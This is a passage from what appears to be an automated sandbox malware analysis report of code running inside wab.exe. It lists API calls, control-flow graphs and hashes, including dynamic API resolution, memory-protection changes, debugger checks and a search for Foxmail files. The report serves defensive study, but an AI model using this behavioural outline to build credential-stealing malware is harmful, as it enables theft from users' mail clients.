                                                                                                                                                                                                            • Part of subcall function 375610F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 375611D0
                                                                                                                                                                                                            • Part of subcall function 375610F1: FindClose.KERNELBASE(00000000), ref: 375611DB
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 375614C5
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 375614E0
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 3756150F
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 37561521
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 37561547
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 37561553
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 37561579
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 37561585
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 375615AB
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 375615B7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                                                                                                          • Opcode ID: e2c625e96b080f242c7989307f553c2e724ad8187ae6b831f2871fc2a0464ef5
                                                                                                                                                                                                          • Instruction ID: 3f2361390d71e1b41c75dca58918dd6446691fcc3f2259c7257a7c9aced71230
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2c625e96b080f242c7989307f553c2e724ad8187ae6b831f2871fc2a0464ef5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4381E1B1A00358AADB24DBA0DC89FEF733CEF84710F101596F908E7180EA755A84CF96
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 3756C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(3756C7DD), ref: 3756C7E6
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,3756C7DD), ref: 3756C838
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 3756C860
                                                                                                                                                                                                            • Part of subcall function 3756C803: GetProcAddress.KERNEL32(00000000,3756C7F4), ref: 3756C804
                                                                                                                                                                                                            • Part of subcall function 3756C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,3756C7F4,3756C7DD), ref: 3756C816
                                                                                                                                                                                                            • Part of subcall function 3756C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,3756C7F4,3756C7DD), ref: 3756C82A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction ID: cdf5899ae09d6b5445586d128cd204cface1726b12458507888f15fafa0265e7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B301266054534038B63852780C0CABA5FD89B63EBCB903B57E000DB093C958F501C3F6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 3756C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 80 3756c7a7-3756c7bc 81 3756c7be-3756c7c6 80->81 82 3756c82d 80->82 81->82 84 3756c7c8-3756c7f6 call 3756c7e6 81->84 83 3756c82f-3756c833 82->83 85 3756c835-3756c83d GetModuleHandleA 83->85 86 3756c872 call 3756c877 83->86 92 3756c86c 84->92 93 3756c7f8 84->93 89 3756c83f-3756c847 85->89 89->89 91 3756c849-3756c84c 89->91 91->83 95 3756c84e-3756c850 91->95 94 3756c86d-3756c86e 92->94 96 3756c7fa-3756c7fc 93->96 97 3756c85b-3756c85e 93->97 98 3756c866-3756c86b 94->98 99 3756c870 94->99 101 3756c856-3756c85a 95->101 102 3756c852-3756c854 95->102 96->94 103 3756c7fe 96->103 100 3756c85f-3756c860 GetProcAddress 97->100 98->92 99->91 104 3756c865 100->104 101->97 102->100 103->104 105 3756c800-3756c80b GetProcAddress 103->105 104->98 105->82 106 3756c80d-3756c81a VirtualProtect 105->106 107 3756c82c 106->107 108 3756c81c-3756c82a VirtualProtect 106->108 107->82 108->107
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,3756C7DD), ref: 3756C838
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 3756C860
                                                                                                                                                                                                            • Part of subcall function 3756C7E6: GetModuleHandleA.KERNEL32(3756C7DD), ref: 3756C7E6
                                                                                                                                                                                                            • Part of subcall function 3756C7E6: GetProcAddress.KERNEL32(00000000,3756C7F4), ref: 3756C804
                                                                                                                                                                                                            • Part of subcall function 3756C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,3756C7F4,3756C7DD), ref: 3756C816
                                                                                                                                                                                                            • Part of subcall function 3756C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,3756C7F4,3756C7DD), ref: 3756C82A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                          • Instruction ID: 6366ae090b5b607d60adcb279f1dcfa97e0a4090f9d4d81b2a0ea5fe1a908b33
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D2105754082816EF7358A744C0C7A66FD89B57AB8F582697D040CB183D5A8B445C3E2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 3756C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 109 3756c803-3756c80b GetProcAddress 110 3756c82d 109->110 111 3756c80d-3756c81a VirtualProtect 109->111 114 3756c82f-3756c833 110->114 112 3756c82c 111->112 113 3756c81c-3756c82a VirtualProtect 111->113 112->110 113->112 115 3756c835-3756c83d GetModuleHandleA 114->115 116 3756c872 call 3756c877 114->116 118 3756c83f-3756c847 115->118 118->118 119 3756c849-3756c84c 118->119 119->114 120 3756c84e-3756c850 119->120 121 3756c856-3756c85e 120->121 122 3756c852-3756c854 120->122 124 3756c85f-3756c865 GetProcAddress 121->124 122->124 126 3756c866-3756c86e 124->126 129 3756c870 126->129 129->119
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,3756C7F4), ref: 3756C804
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,3756C7F4,3756C7DD), ref: 3756C816
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,3756C7F4,3756C7DD), ref: 3756C82A
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,3756C7DD), ref: 3756C838
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 3756C860
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                          • Instruction ID: 4414b269ba67b138ee8bc5725c63d1c014476c683d74b49e57ab612072fee23a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F0C2A55453403CFA3945B80C4DABA5FCC8B67EB8B503A57E104CB183D899B50683F6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 37562639 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 37562645
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 37562710
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 37562730
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 3756273A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                          • Opcode ID: 59dccf956b14e3f7c8f4702a33d7356d99343eedcc863828d49b27dee2b4d864
                                                                                                                                                                                                          • Instruction ID: 4f769350c2632270dac2e66a897b0b4739583d886f149200b7dbd0fcf98a9520
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59dccf956b14e3f7c8f4702a33d7356d99343eedcc863828d49b27dee2b4d864
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4312775D45318DBDB14DFA4C989BCDBBB8AF08308F1051AAE40CBB250EB799A858F45
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 37562264 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 37562276
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 37562285
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 3756228E
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 3756229B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                          • Opcode ID: 394c19cde857b2ad9d90f67de35a08d6cca2c87863d5a7e85b0dedb74c032620
                                                                                                                                                                                                          • Instruction ID: 7097e7e6e14e788e7c0bb80ce78215695856839c1d03c566d48427a1c3a3a89e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 394c19cde857b2ad9d90f67de35a08d6cca2c87863d5a7e85b0dedb74c032620
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7F05F71C10209EBCF04EBB4C54AA9EBBF8FF18315F514895A412F7140E778AB069B51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 37562B1C Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,37562C3B,3756D1DC,00000017), ref: 37562B21
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(3756D1DC,?,37562C3B,3756D1DC,00000017), ref: 37562B2A
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,37562C3B,3756D1DC,00000017), ref: 37562B35
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,37562C3B,3756D1DC,00000017), ref: 37562B3C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                                          • Opcode ID: 4d0f0878b29c5a1ab7d3d7b8caf66671a67b79d8740085836efabfa1313be4d7
                                                                                                                                                                                                          • Instruction ID: 87fbf462f1e28149cb83dc7bfb3f5344d7ad0bc7a18050b565a6e6ecc5d9481f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d0f0878b29c5a1ab7d3d7b8caf66671a67b79d8740085836efabfa1313be4d7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFD0E971084344FBDE043BEADE0EA593B28AB09666F045810F709B6451EA7B9457CB55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 375660E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 375661DA
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 375661E4
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 375661F1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                          • Opcode ID: 29f0f9ca6dcb3c1987d51f60c221891d51443a611d55080ff59b275eb6a88897
                                                                                                                                                                                                          • Instruction ID: cfb578cfaeadcd5101caee0015e6aea25aa147050d3d7fc65ba35f1ad7abc7d5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29f0f9ca6dcb3c1987d51f60c221891d51443a611d55080ff59b275eb6a88897
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE31E87494121CABCB25DF24D988BCDBBB4FF48314F5051DAE81CA7250EB749B858F45
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 37564AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,37564A8A,?,37572238,0000000C,37564BBD,00000000,00000000,?,37562082,37572108,0000000C,37561F3A,?), ref: 37564AD5
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,37564A8A,?,37572238,0000000C,37564BBD,00000000,00000000,?,37562082,37572108,0000000C,37561F3A,?), ref: 37564ADC
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 37564AEE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                          • Opcode ID: 028765b8bb4b80eb211457921e653822d5dddf462841729d1c180a88ca7927a7
                                                                                                                                                                                                          • Instruction ID: 3fb8904076e50beec25e30f74513f1cdafcc3dd188b87cd23ea251df6ac94724
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 028765b8bb4b80eb211457921e653822d5dddf462841729d1c180a88ca7927a7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0E04F35000244AFCF097F59CD0DA893B2AEF40366B409410F90477021DF3AED83DA44
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 37562933 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 3756294C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                          • Opcode ID: 1dd6cf2ae52fddf836cd9c8aa2319b3c4d8ba60a79e5ce8f6e73da43cd261b67
                                                                                                                                                                                                          • Instruction ID: 635c07a1edb139c14fac55e84b51847c415e4fe95b9fc7e215c43bd6eb731ec0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dd6cf2ae52fddf836cd9c8aa2319b3c4d8ba60a79e5ce8f6e73da43cd261b67
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B741ABB19112848BEB18CF54C48679EBBF4FB48328F24856AE405FB344D7B9EA41CB60
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 3756724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                          • Opcode ID: 23b691e6924d9534ef8fbc2777c66e017936323f3c4e9e219663b449dd28a179
                                                                                                                                                                                                          • Instruction ID: ae11916aa59ca89edfe433bd060a1ba55f0998b53168300652dc70dc3612204a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23b691e6924d9534ef8fbc2777c66e017936323f3c4e9e219663b449dd28a179
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0A011302802828F8B088E38830F20C3AACAA082E03000028B808F0200FB2E80038A02
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 3756AA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 220 3756aa53-3756aa6e 221 3756aa80 220->221 222 3756aa70-3756aa7e RtlDecodePointer 220->222 223 3756aa85-3756aa8b 221->223 222->223 224 3756abb2-3756abb5 223->224 225 3756aa91 223->225 228 3756abb7-3756abba 224->228 229 3756ac12 224->229 226 3756aba6 225->226 227 3756aa97-3756aa9a 225->227 230 3756aba8-3756abad 226->230 231 3756ab47-3756ab4a 227->231 232 3756aaa0 227->232 234 3756ac06 228->234 235 3756abbc-3756abbf 228->235 233 3756ac19 229->233 236 3756ac5b-3756ac6a call 37562ada 230->236 242 3756ab4c-3756ab4f 231->242 243 3756ab9d-3756aba4 231->243 237 3756aaa6-3756aaab 232->237 238 3756ab34-3756ab42 232->238 239 3756ac20-3756ac49 233->239 234->229 240 3756abc1-3756abc4 235->240 241 3756abfa 235->241 245 3756ab25-3756ab2f 237->245 246 3756aaad-3756aab0 237->246 238->239 267 3756ac56-3756ac59 239->267 268 3756ac4b-3756ac50 call 37566368 239->268 247 3756abc6-3756abc9 240->247 248 3756abee 240->248 241->234 249 3756ab94-3756ab9b 242->249 250 3756ab51-3756ab54 242->250 244 3756ab61-3756ab8f 243->244 244->267 245->239 252 3756aab2-3756aab5 246->252 253 3756ab1c-3756ab23 246->253 255 3756abe2 247->255 256 3756abcb-3756abd0 247->256 248->241 249->233 250->236 257 3756ab5a 250->257 260 3756aab7-3756aaba 252->260 261 3756ab0d-3756ab17 252->261 259 3756aac7-3756aaf7 253->259 255->248 262 3756abd2-3756abd5 256->262 263 3756abdb-3756abe0 256->263 257->244 259->267 274 3756aafd-3756ab08 call 37566368 259->274 260->236 265 3756aac0 260->265 261->239 262->236 262->263 263->230 265->259 267->236 268->267 274->267
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DecodePointer
                                                                                                                                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                          • API String ID: 3527080286-3064271455
                                                                                                                                                                                                          • Opcode ID: 48b4813459f40b1ee75c2e89dc67250170630dffaaebeb164f61f7e182cc66d2
                                                                                                                                                                                                          • Instruction ID: 13cb8176f063cb80bfe35b450943e61635704e4455e7ba1b195e987f0dc1afe6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48b4813459f40b1ee75c2e89dc67250170630dffaaebeb164f61f7e182cc66d2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0651A1B4A00749DBEF08CFA4D58C2AC7BB0FF49328F515996E480BB265CB359E24CB54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 37561CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 37561D1B
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 37561D37
                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37561D4B
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37561D58
                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37561D72
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37561D7D
